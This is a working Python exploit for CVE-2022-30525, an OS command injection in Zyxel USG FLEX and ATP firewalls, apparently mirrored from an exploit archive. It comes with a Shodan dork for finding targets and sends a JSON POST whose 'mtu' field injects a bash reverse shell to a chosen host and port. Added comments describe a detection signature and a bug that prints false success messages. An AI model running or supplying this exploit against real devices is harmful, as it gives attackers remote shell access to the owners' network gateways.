## https://sploitus.com/exploit?id=PACKETSTORM:167372
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection  
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"  
# Date: May 18th 2022  
# Exploit Author: Valentin Lobstein  
# Vendor Homepage: https://www.zyxel.com  
# Version: ZLD5.00 thru ZLD5.21  
# Tested on: Linux  
# CVE: CVE-2022-30525  
  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
import sys  
import json  
import base64  
import requests  
import argparse  
  
  
# Command-line interface. None of the three options is declared required, so
# an omitted one is stored as None in the parsed namespace; main() relies on
# that to detect missing parameters.
parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
for flag, dest, help_text in (
    ("-u", "url", "Specify target URL"),
    ("-r", "host", "Specify Remote host"),
    ("-p", "port", "Specify Remote port"),
):
    parser.add_argument(flag, dest=dest, help=help_text)

# Parsed at import time, so importing this module consumes sys.argv.
args = parser.parse_args()
  
# Base64-encoded ASCII-art banner; decoded and printed by main(). Kept as one
# literal split over several lines so the encoded text is unchanged.
banner = "".join(
    [
        "ICwtLiAuICAgLCAsLS4gICAgICwtLiAgICwtLiAgLC0uICAsLS4gICAgICAsLS0sICAsLS4gIDs",
        "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg",
        "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg",
        "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8",
        "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg",
        "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n",
        "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp",
        "biA6KSApCg==",
    ]
)
  
  
def main():
    """Print the banner, check that every option was given, then call exploit().

    Reads the module-level ``args`` and ``parser``. Exits (status 0) with the
    help text if any option is missing. Rewrites ``args.url`` in place so that
    exploit() sees the full handler path when it prints the target.
    """
    print("\n" + base64.b64decode(banner).decode("utf-8"))

    # argparse stores every unspecified option as None.
    missing = any(value is None for value in vars(args).values())
    if missing:
        print("[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()

    # Note: this is a substring test, not a scheme check; any URL containing
    # the text "http" is passed through unchanged.
    target = args.url
    if "http" not in target:
        target = "https://" + target
    args.url = target + "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)
  
  
def exploit(url, host, port):
    """Send the CVE-2022-30525 request for *url* and report the outcome on stdout.

    Args:
        url: handler URL; main() has already appended "/ztp/cgi-bin/handler".
        host: address placed in the injected command (connect-back target).
        port: port placed in the injected command (connect-back target).

    Returns:
        None. The result is only printed; see the note on the ``finally``
        block, which does not reliably distinguish success from failure.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }

    # JSON body for the handler's "setWanPortSt" command. The "mtu" field is
    # not a number here: it is the injection point and carries a shell
    # command. Detection note: a POST to /ztp/cgi-bin/handler whose "mtu"
    # value contains shell metacharacters (";", quotes, "bash") is the
    # signature of this request and should never occur in legitimate traffic.
    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    # Certificate verification is disabled on the POST below (verify=False);
    # this only silences the resulting urllib3 warning.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    # NOTE: reads the module-level ``args`` instead of the ``url`` parameter,
    # so this function is tied to the CLI namespace set up by main().
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")

    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:
        # This block also runs after the except branch above, because
        # SystemExit propagates through ``finally``. When the POST raised
        # (timeout, connection error, ...), ``response`` was never bound, the
        # resulting UnboundLocalError is swallowed by the bare ``except``
        # below, and "Enjoy your shell" is printed even though nothing
        # succeeded. The success message is therefore not a confirmation;
        # only the HTTP status line on the other branch reflects an actual
        # server reply.
        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)

        except:
            print("[!] Enjoy your shell !!!")
  
  
# Script entry point; not run when the module is imported (but note that the
# argparse block above still parses sys.argv at import time).
if __name__ == "__main__":
    main()